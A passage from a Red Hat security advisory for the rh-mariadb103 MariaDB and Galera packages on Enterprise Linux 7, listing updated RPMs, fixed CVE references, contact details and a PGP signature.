rh-mariadb103-mariadb-connect-engine-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-debuginfo-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-devel-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-errmsg-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-gssapi-server-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-oqgraph-engine-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-galera-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-galera-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-utils-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-utils-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-test-10.3.35-1.el7.x86_64.rpm

Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-mariadb103-galera-25.3.35-1.el7.src.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.src.rpm

x86_64:  
rh-mariadb103-galera-25.3.35-1.el7.x86_64.rpm  
rh-mariadb103-galera-debuginfo-25.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-backup-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-backup-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-common-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-config-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-config-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-connect-engine-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-debuginfo-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-devel-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-errmsg-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-gssapi-server-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-oqgraph-engine-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-galera-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-galera-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-utils-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-server-utils-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-test-10.3.35-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-46659  
https://access.redhat.com/security/cve/CVE-2021-46661  
https://access.redhat.com/security/cve/CVE-2021-46663  
https://access.redhat.com/security/cve/CVE-2021-46664  
https://access.redhat.com/security/cve/CVE-2021-46665  
https://access.redhat.com/security/cve/CVE-2021-46668  
https://access.redhat.com/security/cve/CVE-2021-46669  
https://access.redhat.com/security/cve/CVE-2022-21427  
https://access.redhat.com/security/cve/CVE-2022-24048  
https://access.redhat.com/security/cve/CVE-2022-24050  
https://access.redhat.com/security/cve/CVE-2022-24051  
https://access.redhat.com/security/cve/CVE-2022-24052  
https://access.redhat.com/security/cve/CVE-2022-27376  
https://access.redhat.com/security/cve/CVE-2022-27377  
https://access.redhat.com/security/cve/CVE-2022-27378  
https://access.redhat.com/security/cve/CVE-2022-27379  
https://access.redhat.com/security/cve/CVE-2022-27380  
https://access.redhat.com/security/cve/CVE-2022-27381  
https://access.redhat.com/security/cve/CVE-2022-27383  
https://access.redhat.com/security/cve/CVE-2022-27384  
https://access.redhat.com/security/cve/CVE-2022-27386  
https://access.redhat.com/security/cve/CVE-2022-27387  
https://access.redhat.com/security/cve/CVE-2022-27445  
https://access.redhat.com/security/cve/CVE-2022-27447  
https://access.redhat.com/security/cve/CVE-2022-27448  
https://access.redhat.com/security/cve/CVE-2022-27449  
https://access.redhat.com/security/cve/CVE-2022-27452  
https://access.redhat.com/security/cve/CVE-2022-27456  
https://access.redhat.com/security/cve/CVE-2022-27458  
https://access.redhat.com/security/cve/CVE-2022-31622  
https://access.redhat.com/security/cve/CVE-2022-31623  
https://access.redhat.com/security/cve/CVE-2022-32083  
https://access.redhat.com/security/cve/CVE-2022-32085  
https://access.redhat.com/security/cve/CVE-2022-32087  
https://access.redhat.com/security/cve/CVE-2022-32088  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYxDdV9zjgjWX9erEAQifSA//aRBkVx5vWWSNWiR+bpq9ro9ZZgI9c1kZ  
CfYDwuybF1RIkEyfkEnDsc09/UzIAumlRqiAWYitb3novcS9G3+PhMI3tNK1lGXm  
wVEZ06kY69AxLcnHazQSh1smJlgOnA+jeBJA3qbCq9gc9d7jVQQTRmLjcQISW0Nc  
Jdg8klmApRdgwQKvFfINWojVwW5+XCYqzgPags5m4/jMSs+zC64l4iedHzdaK9ni  
UeTF41qPmeiwqKfLkaxa7TXXzYO8Nj8kveZj0F7j4ZnAums+FSVmHGNDWu42OKdk  
CDX4XviQt8ykGt/21WHyeFlvxtWkU2nuzPi4MP1/OF9rh5hgImgPXpY34JNjQ6Xu  
2k90YSbZAkk2knsnbAdaDDoHLAMma4CYfjZL54ll9XTD2VVPfGxTeng2NBCWf17U  
xDqCZTVt2GdrYclmX6CE65u6b6LmO6B+ALnRbB9fFC5bFhT/t+PU4MOGBIKK1238  
6vs07JOn+hkadH7Cy0RJukdcJ1IDz7/8BDXaUQNHzcn2I2cpde8luYX3SfXkQqnH  
N2exSc0lseD/J2gWBlxzZqjWyp6ly7byYELgByugXYuCuB2JJwQA0jPmKY5HHVxp  
vCmDOa7jvP81r/LfN0e0q0oM4UE9yThi1Y4mSiKW1TPpmzRwolejwkW0xUu4fQtW  
V6O5WEsw6KYékr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#sql